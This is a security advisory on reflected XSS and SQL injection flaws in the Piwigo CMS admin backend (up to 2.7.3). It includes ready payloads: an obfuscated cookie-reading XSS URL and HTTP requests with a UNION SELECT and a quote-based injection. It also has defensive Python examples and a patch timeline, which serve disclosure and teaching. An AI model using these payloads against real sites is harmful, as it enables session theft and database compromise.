Reflected XSS and SQL injection vulnerabilities in CMS Piwigo <= v. 2.7.3
Author: Steffen Rösemann
Affected Software: CMS Piwigo <= v. 2.7.3 (Release date: 9th January 2015)
Vendor URL: http://piwigo.org
Vendor Status: patched
CVE-ID: -
==========================
Vulnerability Description:
==========================
Piwigo <= v. 2.7.3 suffers from a reflected XSS and from SQL injections in its
administrative backend (one in the "History" page, one in the "Batch Manager").
==================
Technical Details:
==================
The reflected XSS vulnerability resides in the "page" parameter of admin.php in
the administrative backend, reachable in a common Piwigo installation at:
http://{TARGET}/admin.php?page=plugin-AdminTools
The value of "page" is reflected into the response without HTML encoding, so
markup appended to it is rendered. The String.fromCharCode() sequence in the
example below decodes to alert(document.cookie);.
Exploit-Example:
http://{TARGET}/admin.php?page=plugin-AdminTools%3Cimg%20src=n%20onerror=eval%28String.fromCharCode%2897,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,59%29%29%20%3E
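Added example (not part of the original advisory and not Piwigo code): a short Python script that decodes the exploit URL above the way the backend would, unpacks the String.fromCharCode() obfuscation to show what the injected event handler runs, and contrasts a hypothetical verbatim echo of the "page" value with the HTML-encoded output a fixed page should emit. The target host and the "Unknown page:" wrapper text are assumptions made for the example.

```python
import re
from html import escape
from urllib.parse import parse_qs, urlsplit

# Exploit URL from the advisory; the host is a placeholder, not a real target.
EXPLOIT_URL = (
    "http://target.example/admin.php?page=plugin-AdminTools%3Cimg%20src=n%20"
    "onerror=eval%28String.fromCharCode%2897,108,101,114,116,40,100,111,99,117,"
    "109,101,110,116,46,99,111,111,107,105,101,41,59%29%29%20%3E"
)

_FROMCHARCODE = re.compile(r"String\.fromCharCode\(([\d,\s]+)\)")


def page_param(url: str) -> str:
    """Return the percent-decoded 'page' query value exactly as the backend sees it."""
    return parse_qs(urlsplit(url).query)["page"][0]


def decode_fromcharcode(js: str) -> str:
    """Replace every String.fromCharCode(n,n,...) call with the string literal it builds,
    so an obfuscated payload can be read at a glance."""
    def repl(match: re.Match) -> str:
        text = "".join(chr(int(n)) for n in match.group(1).split(","))
        return '"' + text + '"'
    return _FROMCHARCODE.sub(repl, js)


def render_unsafe(page: str) -> str:
    """Hypothetical vulnerable behaviour: echo the parameter into the HTML verbatim."""
    return f"<h2>Unknown page: {page}</h2>"


def render_safe(page: str) -> str:
    """Hardened behaviour: HTML-encode before echoing (what PHP's htmlspecialchars
    with ENT_QUOTES does), so '<' becomes '&lt;' and no element is created."""
    return f"<h2>Unknown page: {escape(page, quote=True)}</h2>"


def injects_element(html: str) -> bool:
    """Crude reflection check: does a raw <img tag survive into the output?"""
    return "<img" in html


if __name__ == "__main__":
    value = page_param(EXPLOIT_URL)
    print("reflected value :", value)
    print("deobfuscated    :", decode_fromcharcode(value))
    print("unsafe reflects :", injects_element(render_unsafe(value)))
    print("safe reflects   :", injects_element(render_safe(value)))
```

Running it shows the event handler is simply eval("alert(document.cookie);"); the encoded version keeps the whole string as inert text inside the heading.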
The SQL injection vulnerability is also located in the administrative backend,
in the "History" functionality:
http://{TARGET}/admin.php?page=history
It can be exploited by appending arbitrary SQL to the POST parameter "user".
In the example below the leading ")" closes the bracket the value is placed in,
AND 1=2 suppresses the legitimate rows, the UNION supplies the same number of
columns (nine) as the original SELECT, and "--" comments out the rest of the
original query:
Exploit-Example:
POST /piwigo/admin.php?page=history HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/piwigo/admin.php?page=history&search_id=82
Cookie: pwg_display_thumbnail=no_display_thumbnail; pwg_id=19rpao6bhdsn3l0u0o1im4m680; _pk_id.1.1fff=7588ea02f4577539.1420720532.1.1420720532.1420720532.
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 255

start=2015-01-08+&end=2015-01-09+&types%5B%5D=none&types%5B%5D=picture&types%5B%5D=high&types%5B%5D=other&user=2) AND 1=2 UNION SELECT user(),database(),3,version(),5,6,7,8,9 -- &image_id=&filename=&ip=&display_thumbnail=no_display_thumbnail&submit=Submit
-------------------------------
An authenticated user who navigates to "Photos / Batch Manager" can apply a number of filters to the photo set. With all filters enabled, clicking "Refresh photo set" sends the following POST request to the server:
POST /piwigo-2.7.3/piwigo/admin.php?page=batch_manager HTTP/1.1
Host: <IP>
Content-Type: application/x-www-form-urlencoded
Cookie: pwg_id=ri5ra17df1v20b0h51liekceu1; interface_language=s%3A2%3A%22en%22%3B

filter_category_use=on&filter_level=1'&filter_level_include_lower=on&filter_dimension_min_width=600&filter_filesize_use=on&regenerateSuccess=0&filter_search_use=on&author=Type+the+author+name+here&filter_prefilter=caddie&title=Type+the+title+here&filter_dimension_min_ratio=1.25&level=4&tag_mode=OR&filter_prefilter_use=on&regenerateError=0&filter_filesize_min=0&filter_duplicates_date=on&remove_date_creation=on&date_creation=2015-02-06+00%3a00%3a00&submitFilter=Refresh+photo+set&filter_dimension_max_height=2300&filter_category_recursive=on&remove_title=on&filter_tags_use=on&filter_filesize_max=15.1&filter_dimension_max_width=3500&filter_dimension_max_ratio=1.78&selectAction=------------------&filter_dimension_use=on&remove_author=on&filter_duplicates_dimensions=on&start=0&filter_level_use=on&[email protected]&confirm_deletion=on&filter_dimension_min_height=480
This POST request is prone to boolean-based blind, error-based and AND/OR time-based blind SQL injection in the parameter filter_level. Appending a single quote to its value (filter_level=1' above) is enough to provoke a database error message.
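Added example (not part of the original advisory and not Piwigo code): a self-contained Python/SQLite model of both injections described above, the nine-column UNION in the History "user" parameter and the error-based and boolean-based probes on the Batch Manager "filter_level" parameter, next to the parameterised queries that neutralise them. The history and images tables, their column names and the bracketed WHERE clause are assumptions chosen so that the advisory's payloads line up; MySQL's user(), database() and version() are swapped for string literals and sqlite_version() so the UNION runs offline, while the payload structure is unchanged.

```python
import sqlite3

# Constructed in-memory stand-in for the two affected queries (NOT Piwigo's schema).
# history has nine columns so that the advisory's nine-column UNION lines up.
def build_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE history (
            id INTEGER, date TEXT, time TEXT, user_id INTEGER, ip TEXT,
            section TEXT, category_id INTEGER, image_id INTEGER, tag_ids TEXT
        );
        INSERT INTO history VALUES
            (1, '2015-01-08', '10:00:00', 2, '127.0.0.1', 'categories', 1, 10, ''),
            (2, '2015-01-09', '11:00:00', 3, '127.0.0.2', 'picture',    1, 11, '');
        CREATE TABLE images (id INTEGER, file TEXT, level INTEGER);
        INSERT INTO images VALUES (10, 'a.jpg', 1), (11, 'b.jpg', 4);
    """)
    return con


HISTORY_COLS = "id, date, time, user_id, ip, section, category_id, image_id, tag_ids"

# Advisory payload for "user", with MySQL's user()/database()/version() replaced by
# literals and sqlite_version() so SQLite accepts it. Structure is identical: close
# the bracket, suppress real rows, UNION nine columns, comment out the tail.
USER_PAYLOAD = "2) AND 1=2 UNION SELECT 'dbuser','piwigo',3,sqlite_version(),5,6,7,8,9 -- "


def history_vulnerable(con, user, start, end):
    """Hypothetical vulnerable shape: the POST value is pasted into the SQL text.
    The leading ')' of the payload closes a bracketed condition like this one."""
    sql = (f"SELECT {HISTORY_COLS} FROM history "
           f"WHERE (user_id = {user}) AND date BETWEEN '{start}' AND '{end}'")
    return con.execute(sql).fetchall()


def history_safe(con, user, start, end):
    """Hardened shape: bound parameters, so the payload is a user id matching nothing."""
    sql = (f"SELECT {HISTORY_COLS} FROM history "
           "WHERE (user_id = ?) AND date BETWEEN ? AND ?")
    return con.execute(sql, (user, start, end)).fetchall()


def batch_filter_vulnerable(con, level):
    """Hypothetical vulnerable shape for filter_level: quoted string concatenation."""
    return con.execute(f"SELECT id, file FROM images WHERE level = '{level}'").fetchall()


def batch_filter_safe(con, level):
    """Hardened shape for filter_level."""
    return con.execute("SELECT id, file FROM images WHERE level = ?", (level,)).fetchall()


def provokes_db_error(fn, con, value) -> bool:
    """Error-based probe from the advisory: does a stray quote make the DB complain?"""
    try:
        fn(con, value)
        return False
    except sqlite3.Error:
        return True


def boolean_probe(fn, con):
    """Boolean-based blind probe: row counts for a true and a false injected condition.
    A vulnerable query answers differently; a parameterised one answers identically."""
    return (len(fn(con, "1' AND '1'='1")), len(fn(con, "1' AND '1'='2")))


if __name__ == "__main__":
    con = build_db()
    print(history_vulnerable(con, USER_PAYLOAD, "2015-01-08", "2015-01-09"))
    print(history_safe(con, USER_PAYLOAD, "2015-01-08", "2015-01-09"))
    print(provokes_db_error(batch_filter_vulnerable, con, "1'"),
          provokes_db_error(batch_filter_safe, con, "1'"))
    print(boolean_probe(batch_filter_vulnerable, con), boolean_probe(batch_filter_safe, con))
```

The vulnerable history query returns one row made entirely of attacker-chosen values (the database "fingerprint" the advisory's payload extracts), the vulnerable filter query raises on the lone quote and answers the two boolean probes differently, and the parameterised versions return nothing unusual for any of them.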
=========
Solution:
=========
Install the latest version 2.7.4 (released 17th February 2015).
====================
Disclosure Timeline:
====================
08-Jan-2015 - found the vulnerability
09-Jan-2015 - informed the developers
09-Jan-2015 - release date of this security advisory [without technical details]
09-Jan-2015 - vendor responded, will work on a patch (released in v. 2.7.4)
17-Feb-2015 - vendor releases patch 2.7.4 (see [3])
17-Feb-2015 - release date of this security advisory
17-Feb-2015 - sent to Full Disclosure
========
Credits:
========
Vulnerability found and advisory written by Steffen Rösemann.
===========
References:
===========
[1] http://piwigo.org
[2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-06.html
[3] http://piwigo.org/forum/viewtopic.php?id=25179
# 0day.today [2018-01-10] #